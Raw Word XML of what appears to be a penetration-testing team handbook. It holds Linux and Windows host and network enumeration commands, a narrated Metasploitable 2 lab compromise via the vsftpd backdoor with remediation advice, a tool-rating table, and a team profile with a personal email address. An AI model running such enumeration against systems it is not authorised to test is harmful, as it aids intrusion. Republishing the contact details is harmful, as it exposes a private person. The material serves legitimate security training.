    <w:p w14:paraId="5EE8D137" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Check listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AF10A9" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t>netstat -tulpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1EE986" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>ss -tulpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1BA7C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="238BE3D1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF8851" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>ip addr show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D5888" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>route -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A095C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="4415F1DA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># DNS lookups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC1376" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>dig target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3527C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nslookup target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017036DE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Windows Command Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F591A1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0A310" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC4606" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18772A46" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>whoami /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D8DF5" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BB144" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>net localgroup administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC5F8F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDAD37A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFEA20" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>ipconfig /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5C2BE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>netstat -ano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3CA2E7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>route print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37425461" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ABECA0" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 6: CASE STUDIES &amp; LESSONS LEARNED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1725F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Case Study: Metasploitable 2 Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD5B7D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Full compromise of Metasploitable 2 from zero access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B8DFF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A34354" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00:00-00:15:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Initial reconnaissance - identified 25+ open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595AE998" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00:15-00:30:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Service enumeration - vsFTPd 2.3.4 flagged as critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC064A2" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00:30-00:45:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Exploitation - vsftpd backdoor yielded root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E14A5B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00:45-01:30:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Post-exploitation - enumerated all services, extracted credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE650A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA724A0" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Default/weak credentials on multiple services (MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A34C87F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Unpatched vulnerabilities from 2011 still present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC76B7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Poor service configuration (anonymous FTP with write access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71634EBA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D02657" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Immediate upgrade of vsFTPd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B9952" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Strong password policies implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02159DBC" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Service hardening using CIS benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250D897" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Regular vulnerability scanning schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291E18A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Tools Performance Analysis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31806" w14:paraId="6D846DDE" w14:textId="77777777" w:rsidTr="00A31806">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="101C8E8A" w14:textId="2AEA3C0B" w:rsidR="00A31806" w:rsidRPr="00263242" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3294F97C" w14:textId="770E3FAF" w:rsidR="00A31806" w:rsidRPr="00263242" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1833CA1D" w14:textId="78AE1B63" w:rsidR="00A31806" w:rsidRPr="00263242" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Effectiveness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15DD79A1" w14:textId="4A5DA278" w:rsidR="00A31806" w:rsidRPr="00263242" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Learning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C8FC6B7" w14:textId="052EB907" w:rsidR="00A31806" w:rsidRPr="00263242" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A31806" w14:paraId="58ABB0FE" w14:textId="77777777" w:rsidTr="00A31806">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17198448" w14:textId="6C7CF671" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48F48E7B" w14:textId="11073009" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="690AD3BB" w14:textId="5BCA7ACC" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>10/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F699EF9" w14:textId="01D5C06D" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7204A1D4" w14:textId="0043C0B0" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Essential tool, steep learning curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A31806" w14:paraId="6B8576B0" w14:textId="77777777" w:rsidTr="00A31806">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA18D16" w14:textId="4243BE10" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52AE8378" w14:textId="3BDF3709" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BF683D0" w14:textId="7D4F2BEF" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>9/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B2B87A6" w14:textId="61555D98" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FFFB0EA" w14:textId="22F46E1B" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Powerful but requires understanding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A31806" w14:paraId="29B7BABD" w14:textId="77777777" w:rsidTr="00A31806">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59F2FF46" w14:textId="1630CC24" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Searchsploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A381385" w14:textId="69143BBF" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Research</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3451AF28" w14:textId="4844F0D8" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>8/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CB96334" w14:textId="17D85BDF" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F1F9B48" w14:textId="624945D6" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Excellent for finding exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A31806" w14:paraId="4F202F18" w14:textId="77777777" w:rsidTr="00A31806">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05E5A34E" w14:textId="30091C0D" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55B6A381" w14:textId="6885FB7B" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Web Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AAB603B" w14:textId="770D98F0" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>7/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B97A580" w14:textId="5FB127AC" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03B51930" w14:textId="2A4BCE52" w:rsidR="00A31806" w:rsidRDefault="00A31806" w:rsidP="00DA5925">
            <w:r w:rsidRPr="00807D52">
              <w:t>Good for quick web app assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F230092" w14:textId="77777777" w:rsidR="00DA5925" w:rsidRPr="00807D52" w:rsidRDefault="00DA5925" w:rsidP="00807D52"/>
    <w:p w14:paraId="49B7BA10" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 7: TEAM DIRECTORY &amp; SKILLS INVENTORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2869D1F4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Team Member Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA844D2" w14:textId="429B7281" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00602480" w:rsidP="00807D52">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shimani Alfred Tlokotsi</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - Project Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18651B8F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Specialties:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Methodology development, report writing, project coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DF0CBF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Mastery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Nmap (Advanced), Metasploit (Intermediate), Python (Intermediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF8E662" w14:textId="0D06FC3E" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Contact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00602480">
        <w:t>alfredtlokotsi@</w:t>
      </w:r>
      <w:r w:rsidR="0027545C">
        <w:t>gmail.com</w:t>
      </w:r>
    </w:p>
